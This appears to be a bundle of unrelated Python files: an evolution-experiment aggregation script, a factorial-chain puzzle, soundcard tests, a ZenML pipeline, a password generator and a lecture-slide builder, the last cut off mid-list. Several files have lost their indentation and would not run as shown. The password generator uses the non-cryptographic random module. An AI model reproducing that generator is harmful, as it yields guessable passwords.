'''
Script: aggMaxFit.py
For each run, grab the maximum fitness organism at end of run.
'''
import argparse, os, errno, csv, sys
import hjson, json
csv.field_size_limit(sys.maxsize)
key_settings = [
"SEED",
"matchbin_metric",
"matchbin_thresh",
"matchbin_regulator",
"TAG_LEN",
"NUM_SIGNAL_RESPONSES",
"NUM_ENV_CYCLES",
"USE_FUNC_REGULATION",
"USE_GLOBAL_MEMORY",
"MUT_RATE__INST_ARG_SUB",
"MUT_RATE__INST_SUB",
"MUT_RATE__INST_INS",
"MUT_RATE__INST_DEL",
"MUT_RATE__SEQ_SLIP",
"MUT_RATE__FUNC_DUP",
"MUT_RATE__FUNC_DEL",
"MUT_RATE__INST_TAG_BF",
"MUT_RATE__FUNC_TAG_BF",
"CPU_TIME_PER_ENV_CYCLE",
"MAX_FUNC_CNT",
"MAX_FUNC_INST_CNT",
"MAX_ACTIVE_THREAD_CNT",
"MAX_THREAD_CAPACITY",
"TOURNAMENT_SIZE",
"INST_MIN_ARG_VAL",
"INST_MAX_ARG_VAL"
]
"""
This is functionally equivalent to the mkdir -p [fname] bash command
"""
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else: raise
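# Note: on Python 3.2+ the same behavior is available directly from the standard
# library (a minimal alternative, shown only as a note):
#   os.makedirs(path, exist_ok=True)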
"""
Given the path to a run's config file, extract the run's settings.
"""
def extract_settings(run_config_path):
content = None
with open(run_config_path, "r") as fp:
content = fp.read().strip().split("\n")
header = content[0].split(",")
header_lu = {header[i].strip():i for i in range(0, len(header))}
content = content[1:]
configs = [l for l in csv.reader(content, quotechar='"', delimiter=',', quoting=csv.QUOTE_ALL, skipinitialspace=True)]
return {param[header_lu["parameter"]]:param[header_lu["value"]] for param in configs}
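# For reference, extract_settings expects run_config.csv to look roughly like the
# sketch below (the "parameter"/"value" headers come from the code above; the
# example values are hypothetical):
#   parameter,value
#   SEED,1001
#   NUM_ENV_CYCLES,16
#   matchbin_metric,hamming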
def find_org_analysis_path(run_path, update):
output_path = os.path.join(run_path, "output")
# Find all org analysis files (analysis_org_0_update_1000.csv)
analysis_files = [fname for fname in os.listdir(output_path) if "analysis_org_" in fname]
def max_key(s):
u = int(s.split("_update_")[-1].split(".")[0])
        if update is None:
return u
else:
return u if u <= update else -1
return os.path.join(output_path, max(analysis_files, key=max_key))
def find_trace_path(run_path, update):
output_path = os.path.join(run_path, "output")
trace_files = [fname for fname in os.listdir(output_path) if "trace_org_" in fname]
def max_key(s):
u = int(s.split("_update_")[-1].split(".")[0])
        if update is None:
return u
else:
return u if u <= update else -1
return os.path.join(output_path, max(trace_files, key=max_key))
"""
Aggregate!
"""
def main():
# Setup the commandline argument parser
parser = argparse.ArgumentParser(description="Data aggregation script.")
parser.add_argument("--data", type=str, nargs="+", help="Where should we pull data (one or more locations)?")
parser.add_argument("--dump", type=str, help="Where to dump this?", default=".")
parser.add_argument("--update", type=int, default=-1, help="What is the maximum update we should pull organisms from?")
parser.add_argument("--out_fname", type=str, help="What should we call the output file?", default="max_fit_orgs.csv")
# Extract arguments from commandline
args = parser.parse_args()
data_dirs = args.data
dump_dir = args.dump
dump_fname = args.out_fname
update = args.update
# Are all data directories for real?
if any([not os.path.exists(loc) for loc in data_dirs]):
print("Unable to locate all data directories. Able to locate:", {loc: os.path.exists(loc) for loc in data_dirs})
exit(-1)
mkdir_p(dump_dir)
# Aggregate a list of all runs
run_dirs = [os.path.join(data_dir, run_dir) for data_dir in data_dirs for run_dir in os.listdir(data_dir) if "RUN_" in run_dir]
    # sort run directories by seed so the output is easier to scan
run_dirs.sort(key=lambda x : int(x.split("_")[-1]))
print(f"Found {len(run_dirs)} run directories.")
analysis_header_set = set() # Use this to guarantee all organism file headers match.
# For each run, aggregate max fitness organism information.
analysis_org_infos = []
for run in run_dirs:
print(f"Extracting information from {run}")
run_config_path = os.path.join(run, "output", "run_config.csv")
        # NOTE: these find functions will crash if a run's output directory is missing or contains no matching analysis/trace files
org_analysis_path = find_org_analysis_path(run, update if update >= 0 else None)
org_trace_path = find_trace_path(run, update if update >= 0 else None)
if not os.path.exists(run_config_path):
print(f"Failed to find run parameters ({run_config_path})")
exit(-1)
# double check that analysis and trace files are from the same update and org ID
analysis_update = org_analysis_path.split("/")[-1].split("_update_")[-1].split(".")[0]
trace_update = org_trace_path.split("/")[-1].split("_update_")[-1].split(".")[0]
if analysis_update != trace_update:
print(f"Analysis file and trace file updates do not match: \n * {analysis_update}\n * {trace_update}\n")
exit(-1)
        analysis_id = os.path.basename(org_analysis_path).replace("analysis_org_", "").split("_update_")[0]
        trace_id = os.path.basename(org_trace_path).replace("trace_org_", "").split("_update_")[0]
        if analysis_id != trace_id:
            print(f"Analysis file and trace file org IDs do not match: \n * {analysis_id}\n * {trace_id}\n")
exit(-1)
# extract run settings
run_settings = extract_settings(run_config_path)
# ========= extract analysis file info =========
content = None
with open(org_analysis_path, "r") as fp:
content = fp.read().strip().split("\n")
analysis_header = content[0].split(",")
analysis_header_lu = {analysis_header[i].strip():i for i in range(0, len(analysis_header))}
content = content[1:]
orgs = [l for l in csv.reader(content, quotechar='"', delimiter=',', quoting=csv.QUOTE_ALL, skipinitialspace=True)]
org = orgs[-1]
# -- collect extra fields --
base_score = float(org[analysis_header_lu["score"]])
ko_reg_score = float(org[analysis_header_lu["score_ko_regulation"]])
ko_gmem_score = float(org[analysis_header_lu["score_ko_global_memory"]])
ko_all_score = float(org[analysis_header_lu["score_ko_all"]])
ko_up_reg_score = float(org[analysis_header_lu["score_ko_up_reg"]])
ko_down_reg_score = float(org[analysis_header_lu["score_ko_down_reg"]])
use_regulation = int(ko_reg_score < base_score)
use_global_memory = int(ko_gmem_score < base_score)
use_either = int(ko_all_score < base_score)
use_up_reg = int(ko_up_reg_score < base_score)
use_down_reg = int(ko_down_reg_score < base_score)
ko_reg_delta = base_score - ko_reg_score
ko_global_mem_delta = base_score - ko_gmem_score
ko_all_delta = base_score - ko_all_score
ko_up_reg_delta = base_score - ko_up_reg_score
ko_down_reg_delta = base_score - ko_down_reg_score
extra_fields = ["relies_on_regulation", "relies_on_global_memory", "relies_on_either",
"relies_on_up_reg", "relies_on_down_reg",
"ko_regulation_delta", "ko_global_memory_delta", "ko_all_delta",
"ko_up_reg_delta", "ko_down_reg_delta"]
trace_fields = ["call_promoted_cnt", "call_repressed_cnt"]
extra_values = [use_regulation, use_global_memory, use_either,
use_up_reg, use_down_reg,
ko_reg_delta, ko_global_mem_delta, ko_all_delta,
ko_up_reg_delta, ko_down_reg_delta]
analysis_header_set.add(",".join([key for key in key_settings] + extra_fields + trace_fields + analysis_header))
if len(analysis_header_set) > 1:
print(f"Header mismatch! ({org_analysis_path})")
exit(-1)
# surround things in quotes that need it
org[analysis_header_lu["program"]] = "\"" + org[analysis_header_lu["program"]] + "\""
num_modules = int(org[analysis_header_lu["num_modules"]])
# ========= extract org trace information =========
content = None
with open(org_trace_path, "r") as fp:
content = fp.read().strip().split("\n")
trace_header = content[0].split(",")
trace_header_lu = {trace_header[i].strip():i for i in range(0, len(trace_header))}
content = content[1:]
steps = [l for l in csv.reader(content, quotechar='"', delimiter=',', quoting=csv.QUOTE_ALL, skipinitialspace=True)]
time_steps = [i for i in range(len(steps))]
# We want to work with the thread state info as a python dict, so..
# - raw string ==[hjson]==> OrderedDict ==[json]==> python dict
thread_states = [step[trace_header_lu["thread_state_info"]].replace(",", ",\n") for step in steps]
thread_states = [list(json.loads(json.dumps(hjson.loads(state)))) for state in thread_states]
if len(set([len(thread_states), len(time_steps), len(steps)])) != 1:
print("Trace steps do not match among components.")
exit(-1)
        # From the thread states, collect which modules are present and active at each
        # time step and within each environment cycle.
num_env_cycles = int(run_settings["NUM_ENV_CYCLES"])
modules_run_in_env_cycle = [set() for i in range(num_env_cycles)]
match_delta_in_env_cycle = [[0 for i in range(num_modules)] for i in range(num_env_cycles)]
module_triggered_by_env_cycle = [None for i in range(num_env_cycles)]
module_response_by_env_cycle = [set() for i in range(num_env_cycles)]
modules_active_ever = set()
modules_present_by_step = [[0 for m in range(0, num_modules)] for i in range(0, len(steps))]
modules_active_by_step = [[0 for m in range(0, num_modules)] for i in range(0, len(steps))]
modules_triggered_by_step = [None for i in range(0, len(steps))]
modules_responded_by_step = [None for i in range(0, len(steps))]
# Figure out which module responded to each environment signal.
for i in range(0, len(steps)):
step_info = {trace_header[j]: steps[i][j] for j in range(0, len(steps[i])) }
cur_response_module_id = int(step_info["cur_responding_function"])
cur_env_update = int(step_info["env_cycle"])
if cur_response_module_id != -1:
module_response_by_env_cycle[cur_env_update].add(cur_response_module_id)
modules_responded_by_step[i] = cur_response_module_id
        if any([len(e) > 1 for e in module_response_by_env_cycle]):
            print("Error: more than one module responded within a single environment cycle.")
            exit(-1)
cur_env = int(steps[0][trace_header_lu["env_cycle"]])
baseline_match_scores = list(map(float, steps[0][trace_header_lu["env_signal_match_scores"]].strip("[]").split(",")))
module_triggered_by_env_cycle[0] = steps[0][trace_header_lu["env_signal_closest_match"]]
modules_triggered_by_step[0] = steps[0][trace_header_lu["env_signal_closest_match"]]
for i in range(0, len(steps)):
# print(f"==== step {i} ====")
step_info = steps[i]
threads = thread_states[i]
# Extract current env cycle
env_cycle = int(step_info[trace_header_lu["env_cycle"]])
            # If we've entered a new env cycle, record the match score deltas for the cycle that just ended.
if env_cycle != cur_env:
cur_match_scores = list(map(float, step_info[trace_header_lu["env_signal_match_scores"]].strip("[]").split(",")))
match_delta_in_env_cycle[cur_env] = [cur - baseline for baseline, cur in zip(baseline_match_scores, cur_match_scores)]
# update baseline/current environment
baseline_match_scores = cur_match_scores
cur_env = env_cycle
module_triggered_by_env_cycle[env_cycle] = step_info[trace_header_lu["env_signal_closest_match"]]
modules_triggered_by_step[i] = step_info[trace_header_lu["env_signal_closest_match"]]
# Extract what modules are running
# print("# Threads = ", len(threads))
# print(threads)
active_modules = []
present_modules = []
            if modules_triggered_by_step[i] is not None:
active_modules.append(int(modules_triggered_by_step[i]))
present_modules.append(int(modules_triggered_by_step[i]))
            if modules_responded_by_step[i] is not None:
active_modules.append(int(modules_responded_by_step[i]))
present_modules.append(int(modules_responded_by_step[i]))
for thread in threads:
call_stack = thread["call_stack"]
# an active module is at the top of the flow stack on the top of the call stack
active_module = None
if len(call_stack):
if len(call_stack[-1]["flow_stack"]):
active_module = call_stack[-1]["flow_stack"][-1]["mp"]
                if active_module is not None:
active_modules.append(int(active_module))
modules_active_ever.add(int(active_module))
# add ALL modules
present_modules += list({flow["mp"] for call in call_stack for flow in call["flow_stack"]})
# add present modules to env set for this env
for module_id in present_modules: modules_run_in_env_cycle[env_cycle].add(int(module_id))
# Add active modules for this step
for module_id in active_modules: modules_active_by_step[i][module_id] += 1
# Add present modules for this step
for module_id in present_modules: modules_present_by_step[i][module_id] += 1
######### NEW ###########
final_match_scores = list(map(float, steps[-1][trace_header_lu["env_signal_match_scores"]].strip("[]").split(",")))
match_delta_in_env_cycle[cur_env] = [final - baseline for baseline, final in zip(baseline_match_scores, final_match_scores)]
######### NEW ###########
# ========= build regulation trace out file for this run =========
# - There's one trace output file per run
# - Extra fields:
# - module_id
# - time_step
# - currently_running/in the call stack
# - match_score__mid_[:]
# - regulator_state__mid_[:]
trace_out_name = f"trace-reg_update-{update}_run-id-" + run_settings["SEED"] + ".csv"
orig_fields = ["env_cycle","cpu_step","num_env_states","cur_env_state","cur_response","has_correct_response","num_modules","env_signal_closest_match","num_active_threads"]
derived_fields = ["module_id", "time_step", "is_in_call_stack", "is_running", "is_cur_responding_function", "is_match", "is_ever_active", "match_score", "regulator_state"]
trace_header = ",".join(orig_fields + derived_fields)
trace_out_lines = []
expected_lines = num_modules * len(steps)
# For each time step, for each module => add line to file
for step_i in range(0, len(steps)):
step_info = steps[step_i]
orig_component = [step_info[trace_header_lu[field]] for field in orig_fields]
time_step = time_steps[step_i]
cur_match = int(step_info[trace_header_lu["env_signal_closest_match"]])
cur_match_scores = list(map(float, step_info[trace_header_lu["env_signal_match_scores"]].strip("[]").split(",")))
cur_reg_states = list(map(float, step_info[trace_header_lu["module_regulator_states"]].strip("[]").split(",")))
cur_responding_function = int(step_info[trace_header_lu["cur_responding_function"]])
modules_present = modules_present_by_step[step_i]
modules_active = modules_active_by_step[step_i]
for module_id in range(0, num_modules):
derived_vals = [module_id, # module_id
time_step, # time_step
modules_present[module_id], # is_in_call_stack
modules_active[module_id], # is_running
int(cur_responding_function == module_id), # is_cur_responding_function
int(cur_match == module_id), # is_match
int(module_id in modules_active_ever), # is_ever_active
cur_match_scores[module_id], # match_score
cur_reg_states[module_id] # regulator_state
]
trace_out_lines.append(",".join(map(str, orig_component + derived_vals)))
        if expected_lines != len(trace_out_lines):
            print(f"Unexpected number of trace output lines: expected {expected_lines}, got {len(trace_out_lines)}.")
            exit(-1)
with open(os.path.join(dump_dir, trace_out_name), "w") as fp:
fp.write("\n".join([trace_header] + trace_out_lines))
print(" Wrote out:", os.path.join(dump_dir, trace_out_name))
trace_out_lines = None
# ========= build execution trace out file for this run =========
exec_trace_out_name = f"trace-exec_update-{update}_run-id-" + run_settings["SEED"] + ".csv"
exec_trace_orig_fields = ["env_cycle","cpu_step","num_env_states","cur_env_state","cur_response","has_correct_response","num_modules","num_active_threads"]
exec_trace_fields = exec_trace_orig_fields + ["time_step", "active_instructions"]
exec_trace_out_lines = [",".join(exec_trace_fields)]
for step_i in range(0, len(steps)):
step_info = steps[step_i]
line_info = {field:step_info[trace_header_lu[field]] for field in exec_trace_orig_fields}
line_info["time_step"] = step_i
line_info["active_instructions"] = f'"{step_info[trace_header_lu["executed_instructions"]]}"'
exec_trace_out_lines.append(",".join([str(line_info[field]) for field in exec_trace_fields]))
with open(os.path.join(dump_dir, exec_trace_out_name), "w") as fp:
fp.write("\n".join( exec_trace_out_lines ))
#################################################################################
# Regulation graph
env_cycle_graph_out_name = f"reg-graph_update-{update}_run-id-" + run_settings["SEED"] + ".csv"
env_cycle_graph_fields = ["state_id", "env_cycle", "time_step", "module_triggered", "module_responded", "active_modules", "promoted", "repressed", "match_scores" , "match_deltas", "reg_deltas"]
lines = [",".join(env_cycle_graph_fields)]
# == build env cycle reg graph ==
state_i = None
prev_env_cycle = None
prev_active_modules = None
prev_match_scores = None
prev_reg_state = None
found_first_module = False
calls_with_repressors = 0
calls_with_promotors = 0
for step_i in range(0, len(steps)):
step_info = steps[step_i]
# Extract current env cycle
env_cycle = int(step_info[trace_header_lu["env_cycle"]])
# Extract active modules (top of call stacks)
active_modules = {i for i in range(0, num_modules) if modules_active_by_step[step_i][i] > 0}
match_scores = list(map(float, step_info[trace_header_lu["env_signal_match_scores"]].strip("[]").split(",")))
reg_state = list(map(float, step_info[trace_header_lu["module_regulator_states"]].strip("[]").split(",")))
# if this is the first time step, setup 'previous' state
if step_i == 0:
state_i = 0
prev_env_cycle = env_cycle
prev_active_modules = active_modules
prev_match_scores = match_scores
prev_reg_state = reg_state
if not found_first_module:
prev_active_modules = active_modules
found_first_module = len(active_modules) > 0
# Has anything been repressed/promoted?
match_deltas = [match_scores[i] - prev_match_scores[i] for i in range(0, num_modules)]
reg_deltas = [reg_state[i] - prev_reg_state[i] for i in range(0, num_modules)]
promoted_modules = { i for i in range(0, num_modules) if reg_state[i] < prev_reg_state[i] }
repressed_modules = { i for i in range(0, num_modules) if reg_state[i] > prev_reg_state[i] }
# if current active modules or current env cycle don't match previous, output what happened since last time we output
if (( active_modules != prev_active_modules and len(active_modules) != 0 )
or (step_i == (len(steps) - 1))
or (len(promoted_modules) != 0)
or (len(repressed_modules) != 0)):
calls_with_repressors += len(repressed_modules)
calls_with_promotors += len(promoted_modules)
promoted_str = "\"" + str(list(promoted_modules)).replace(" ", "") + "\""
repressed_str = "\"" + str(list(repressed_modules)).replace(" ", "") + "\""
deltas = "\"" + str(match_deltas).replace(" ", "") + "\"" # deltas from beginning => end of state
scores = "\"" + str(match_scores).replace(" ", "") + "\"" # match scores at end of state
reg_deltas_str = "\"" + str(reg_deltas).replace(" ", "") + "\""
active_modules_str = "\"" + str(list(prev_active_modules)).replace(" ", "") + "\"" # active modules _during_ this state
module_triggered = module_triggered_by_env_cycle[prev_env_cycle] # module triggered for this environment cycle
module_responded = -1 if len(module_response_by_env_cycle[prev_env_cycle]) == 0 else list(module_response_by_env_cycle[prev_env_cycle])[0]
lines.append(",".join([str(state_i), str(prev_env_cycle), str(step_i), str(module_triggered), str(module_responded), active_modules_str, promoted_str, repressed_str, scores, deltas, reg_deltas_str]))
prev_match_scores = match_scores
prev_active_modules = active_modules
prev_env_cycle = env_cycle
prev_reg_state = reg_state
state_i += 1
with open(os.path.join(dump_dir, env_cycle_graph_out_name), "w") as fp:
fp.write("\n".join(lines))
print(" Wrote out:", os.path.join(dump_dir, env_cycle_graph_out_name))
trace_values = [str(calls_with_promotors), str(calls_with_repressors)]
# append csv line (as a list) for analysis orgs
analysis_org_infos.append([run_settings[key] for key in key_settings] + extra_values + trace_values + org)
# Output analysis org infos
out_content = list(analysis_header_set)[0] + "\n" # Should be guaranteed to be length 1!
out_content += "\n".join([",".join(map(str, line)) for line in analysis_org_infos])
with open(os.path.join(dump_dir, dump_fname), "w") as fp:
fp.write(out_content)
print(f"Done! Output written to {os.path.join(dump_dir, dump_fname)}")
if __name__ == "__main__":
main()
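# Example invocation (a sketch; the directory names below are hypothetical):
#   python aggMaxFit.py --data ./exp/condition_a ./exp/condition_b \
#       --dump ./aggregated --update 10000 --out_fname max_fit_orgs.csv
# Each --data location is expected to contain RUN_* directories whose output/
# subdirectory holds run_config.csv plus the analysis_org_*.csv and
# trace_org_*.csv files read above.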
|
import math
count = 0
for i in range(1, 1000000):
r = {}
while True:
r[i] = True
sum1 = 0
for j in str(i):
sum1 += math.factorial(int(j))
i=sum1
try:
if r[i]:
if len(r)==60:
count += 1
break
except:
pass
print(count) # 402
"""
I could speed this up by adding a memory of each chain...
"""
|
import json
with open("data/testdata.txt") as fp:
    json_data = fp.read()
data = json.loads(json_data)
print(data)
|
"""
"""
import random
class CreatePassword:
"""
"""
def __init__(self, length):
self._length = length
def generate_pwd(self, lower_case=None, upper_case=None, special=None, numbers=None):
"""
:param lower_case:
:param upper_case:
:param special:
:param numbers:
:return:
"""
characters = list()
if lower_case:
characters.extend('abcdefghijklmnopqrstuvwxyz')
if upper_case:
characters.extend('ABCDEFGHIJKLMNOPQRSTUVWXYZ')
if special:
characters.extend('!@#$%^&*()_')
if numbers:
characters.extend('1234567890')
pwd = ''
for i in range(self._length):
pwd += random.choice(characters)
return pwd
def generate_weak_pwd(self):
return self.generate_pwd(lower_case=True)
def generate_strong_pwd(self):
return self.generate_pwd(lower_case=True, upper_case=True, numbers=True, special=True)
p = CreatePassword(9)
# print(p.generate_pwd(numbers=True, lower_case=True))
# print(p.generate_weak_pwd())
# print(p.generate_strong_pwd())
# todo: design another class for the password generator using the methods (Upper_case, Special, Numbers, etc)
|
import sys
import soundcard
import numpy
import pytest
ones = numpy.ones(1024)
signal = numpy.concatenate([[ones], [-ones]]).T
def test_speakers():
for speaker in soundcard.all_speakers():
assert isinstance(speaker.name, str)
assert hasattr(speaker, 'id')
assert isinstance(speaker.channels, int)
assert speaker.channels > 0
def test_microphones():
for microphone in soundcard.all_microphones():
assert isinstance(microphone.name, str)
assert hasattr(microphone, 'id')
assert isinstance(microphone.channels, int)
assert microphone.channels > 0
def test_default_playback():
soundcard.default_speaker().play(signal, 44100, channels=2)
def test_default_record():
recording = soundcard.default_microphone().record(1024, 44100)
    assert len(recording) == 1024
def test_default_blockless_record():
recording = soundcard.default_microphone().record(None, 44100)
@pytest.fixture
def loopback_speaker():
import sys
if sys.platform == 'win32':
# must install https://www.vb-audio.com/Cable/index.htm
return soundcard.get_speaker('Cable')
elif sys.platform == 'darwin':
# must install soundflower
return soundcard.get_speaker('Soundflower64')
elif sys.platform == 'linux':
# pacmd load-module module-null-sink channels=6 rate=48000
return soundcard.get_speaker('Null')
else:
raise RuntimeError('Unknown platform {}'.format(sys.platform))
@pytest.fixture
def loopback_player(loopback_speaker):
with loopback_speaker.player(48000, channels=2, blocksize=512) as player:
yield player
@pytest.fixture
def loopback_microphone():
if sys.platform == 'win32':
# must install https://www.vb-audio.com/Cable/index.htm
return soundcard.get_microphone('Cable')
elif sys.platform == 'darwin':
# must install soundflower
return soundcard.get_microphone('Soundflower64')
elif sys.platform == 'linux':
return soundcard.get_microphone('Null', include_loopback=True)
else:
raise RuntimeError('Unknown platform {}'.format(sys.platform))
@pytest.fixture
def loopback_recorder(loopback_microphone):
with loopback_microphone.recorder(48000, channels=2, blocksize=512) as recorder:
yield recorder
def test_loopback_playback(loopback_player, loopback_recorder):
loopback_player.play(signal)
recording = loopback_recorder.record(1024*10)
assert recording.shape[1] == 2
left, right = recording.T
assert left.mean() > 0
assert right.mean() < 0
assert (left > 0.5).sum() == len(signal)
assert (right < -0.5).sum() == len(signal)
def test_loopback_reverse_recorder_channelmap(loopback_player, loopback_microphone):
with loopback_microphone.recorder(48000, channels=[1, 0], blocksize=512) as loopback_recorder:
loopback_player.play(signal)
recording = loopback_recorder.record(1024*12)
assert recording.shape[1] == 2
left, right = recording.T
assert right.mean() > 0
assert left.mean() < 0
assert (right > 0.5).sum() == len(signal)
assert (left < -0.5).sum() == len(signal)
def test_loopback_reverse_player_channelmap(loopback_speaker, loopback_recorder):
with loopback_speaker.player(48000, channels=[1, 0], blocksize=512) as loopback_player:
loopback_player.play(signal)
recording = loopback_recorder.record(1024*12)
assert recording.shape[1] == 2
left, right = recording.T
assert right.mean() > 0
assert left.mean() < 0
assert (right > 0.5).sum() == len(signal)
assert (left < -0.5).sum() == len(signal)
def test_loopback_mono_player_channelmap(loopback_speaker, loopback_recorder):
with loopback_speaker.player(48000, channels=[0], blocksize=512) as loopback_player:
loopback_player.play(signal[:,0])
recording = loopback_recorder.record(1024*12)
assert recording.shape[1] == 2
left, right = recording.T
assert left.mean() > 0
if sys.platform == 'linux':
# unmapped channels on linux are filled with the mean of other channels
assert right.mean() < left.mean()
else:
assert abs(right.mean()) < 0.01 # something like zero
assert (left > 0.5).sum() == len(signal)
def test_loopback_mono_recorder_channelmap(loopback_player, loopback_microphone):
with loopback_microphone.recorder(48000, channels=[0], blocksize=512) as loopback_recorder:
loopback_player.play(signal)
recording = loopback_recorder.record(1024*12)
assert len(recording.shape) == 1 or recording.shape[1] == 1
assert recording.mean() > 0
assert (recording > 0.5).sum() == len(signal)
def test_loopback_multichannel_channelmap(loopback_speaker, loopback_microphone):
with loopback_speaker.player(48000, channels=[2, 0], blocksize=512) as loopback_player:
with loopback_microphone.recorder(48000, channels=[2, 0], blocksize=512) as loopback_recorder:
loopback_player.play(signal)
recording = loopback_recorder.record(1024*12)
assert len(recording.shape) == 2
left, right = recording.T
assert left.mean() > 0
assert right.mean() < 0
assert (left > 0.5).sum() == len(signal)
assert (right < -0.5).sum() == len(signal)
|
"""
Licensed under the MIT License.
Copyright (c) 2021-2031. All rights reserved.
"""
import pandas as pd
import numpy as np
import os
import lightgbm as lgb
from sklearn.model_selection import StratifiedKFold
from sklearn.metrics import balanced_accuracy_score
from zenml.pipelines import pipeline
from zenml.steps import step
from zenml.steps.step_output import Output
from zenml.steps.base_step_config import BaseStepConfig
class pipeline_config(BaseStepConfig):
"""
Params used in the pipeline
"""
label: str = 'species'
@step
def split_data(config: pipeline_config) -> Output(
X=pd.DataFrame, y=pd.DataFrame
):
path_to_csv = os.path.join('~/airflow/data', 'leaf.csv')
df = pd.read_csv(path_to_csv)
label = config.label
y = df[[label]]
X = df.drop(label, axis=1)
return X, y
@step
def train_evaltor(
config: pipeline_config,
X: pd.DataFrame,
y: pd.DataFrame
) -> float:
y = y[config.label]
folds = StratifiedKFold(n_splits=5, shuffle=True, random_state=10)
lgbm = lgb.LGBMClassifier(objective='multiclass', random_state=10)
metrics_lst = []
for train_idx, val_idx in folds.split(X, y):
X_train, y_train = X.iloc[train_idx], y.iloc[train_idx]
X_val, y_val = X.iloc[val_idx], y.iloc[val_idx]
lgbm.fit(X_train, y_train)
y_pred = lgbm.predict(X_val)
cv_balanced_accuracy = balanced_accuracy_score(y_val, y_pred)
metrics_lst.append(cv_balanced_accuracy)
avg_performance = np.mean(metrics_lst)
print(f"Avg Performance: {avg_performance}")
return avg_performance
@pipeline
def super_mini_pipeline(
data_spliter,
train_evaltor
):
X, y = data_spliter()
train_evaltor(X=X, y=y)
# run the pipeline
pipeline_instance = super_mini_pipeline(
    data_spliter=split_data(),
    train_evaltor=train_evaltor(),
)
DAG = pipeline_instance.run()
|
import random
import pyexlatex as pl
import pyexlatex.table as lt
import pyexlatex.presentation as lp
import pyexlatex.graphics as lg
import pyexlatex.layouts as ll
import plbuild
from lectures.lab_exercises.notes import get_intro_to_pandas_lab_lecture, get_pandas_styling_lab_lecture, \
get_intro_python_visualization_lab_lecture
from lectures.visualization.main import get_visualization_lecture
from plbuild.paths import images_path
from pltemplates.exercises.lab_exercise import LabExercise
from pltemplates.frames.in_class_example import InClassExampleFrame
from pltemplates.frames.model_flowchart import (
ModelFlowchartFrame,
real_world_style,
model_style,
in_out_style
)
from pltemplates.blocks import LabBlock
from pltemplates.frames.tvm.project_1_lab import get_project_1_lab_frame
from models.retirement import RetirementModel
from schedule.main import LECTURE_6_NAME
pd_mono = pl.Monospace('pandas')
AUTHORS = ['Nick DeRobertis']
SHORT_TITLE = 'Visualization'
SUBTITLE = f'An Introduction to Visualization and {pd_mono}'
SHORT_AUTHOR = 'DeRobertis'
INSTITUTIONS = [
['University of Florida', 'Department of Finance, Insurance, and Real Estate'],
]
SHORT_INSTITUTION = 'UF'
DOCUMENT_CLASS = lp.Presentation
OUTPUT_LOCATION = plbuild.paths.SLIDES_BUILD_PATH
HANDOUTS_OUTPUT_LOCATION = plbuild.paths.HANDOUTS_BUILD_PATH
TITLE = LECTURE_6_NAME
ORDER = 'S6'
def get_content():
random.seed(1000)
lecture = get_visualization_lecture()
intro_pandas_lab = get_intro_to_pandas_lab_lecture().to_pyexlatex()
styling_pandas_lab = get_pandas_styling_lab_lecture().to_pyexlatex()
graphing_lab = get_intro_python_visualization_lab_lecture().to_pyexlatex()
appendix_frames = [
lecture.pyexlatex_resources_frame,
intro_pandas_lab.appendix_frames(),
styling_pandas_lab.appendix_frames(),
graphing_lab.appendix_frames()
]
ret_model = RetirementModel()
ret_df = ret_model.get_formatted_df(num_years=12)
ret_table = lt.Tabular.from_df(ret_df, extra_header=pl.Bold('Retirement Info'))
plt_mono = pl.Monospace('matplotlib')
df_mono = pl.Monospace('DataFrame')
df_basic_example = pl.Python(
"""
>>> import pandas as pd
>>> df = pd.DataFrame()
>>> df['Sales'] = [1052, 212, 346]
>>> df['Category'] = ['Aprons', 'Apples', 'Bowties']
df
"""
)
plot_example_code = pl.Python(
"""
>>> %matplotlib inline
>>> ret_df.plot.line(x='Time', y='Salaries')
"""
)
return [
pl.Section(
[
lp.DimRevealListFrame(
[
"So far we've had one main output from our model, number of years",
"Salaries and wealth over time have also been outputs, but we haven't had a good way of understanding "
"that output. It's a bunch of numbers.",
"This is where visualization comes in. We have some complex result, and want to make it easily "
"interpretable."
],
title='Why Visualize?'
),
lp.Frame(
[
pl.Center(ret_table)
],
title='What we Have so Far'
),
lp.GraphicFrame(
images_path('excel-insert-chart.png'),
title='Visualization in Excel'
),
lp.GraphicFrame(
lg.ModifiedPicture(
images_path('python-visualization-landscape.jpg'),
[
lg.Path('draw', [(0.52, 0.52), (0.85, 0.67)], options=['red'], draw_type='rectangle',
overlay=lp.Overlay([2]))
]
),
title='An Overwhelming Number of Options in Python'
),
lp.DimRevealListFrame(
[
["Ultimately, we will be creating graphs using", plt_mono, "but we won't use it directly."],
["Instead, we will use", pd_mono],
[pd_mono, "is actually creating its graphs using", plt_mono,
"for us, but it is simpler to use."]
],
title='Explaining Python Visualization in This Class'
),
InClassExampleFrame(
[
'I will now go back to the "Dynamic Salary Retirement Model.xlsx" Excel model to '
'add visualization',
'I have also uploaded the completed workbook from this exercise '
'as "Dynamic Salary Retirement Model Visualized.xlsx"',
'Follow along as I go through the example.',
],
title='Visualization in Excel',
block_title='Adding Graphs to the Dynamic Salary Retirement Excel Model'
),
],
title='Visualization Introduction',
short_title='Intro'
),
pl.Section(
[
lp.DimRevealListFrame(
[
[pd_mono, "does", pl.Bold('a lot'), 'more than just graphing. We will use it throughout the '
'rest of the class.'],
"Previously we've worked with lists, numbers, strings, and even our custom types (our model dataclasses)",
[pd_mono, "provides the", df_mono, "as a new type that we can use."],
f'Before we can get to graphing, we must learn how to use the {df_mono}.'
],
title='Some Setup Before we can Visualize in Python'
),
lp.Frame(
[
['A', df_mono, 'is essentially a table. It has rows and columns, just like in Excel.'],
pl.VFill(),
lp.Block(
[
pl.UnorderedList([
'Add or remove columns or rows',
'Group by and aggregate',
'Load in and output data from/to Excel and many other formats',
'Merge and join data sets',
'Reshape and pivot data',
'Time-series functionality',
'Slice and query your data',
'Handle duplicates and missing data'
])
],
title=f'Some Features of the {df_mono}'
)
],
title=f'What is a {df_mono}?'
),
lp.Frame(
[
df_basic_example,
pl.Graphic(images_path('df-basic-example.png'), width=0.3)
],
title=f'A Basic {df_mono} Example'
),
InClassExampleFrame(
[
'I will now go through the notebook in '
'"Intro to Pandas and Table Visualization.ipynb"',
'Follow along as I go through the example.',
'We will complete everything up until DataFrame Styling'
],
title='Introduction to Pandas',
block_title='Creating and Using Pandas DataFrames'
),
intro_pandas_lab.presentation_frames(),
lp.DimRevealListFrame(
[
['It is possible to add styling to our displayed tabular data by styling the', df_mono],
'The styling is very flexible and essentially allows you to do anything',
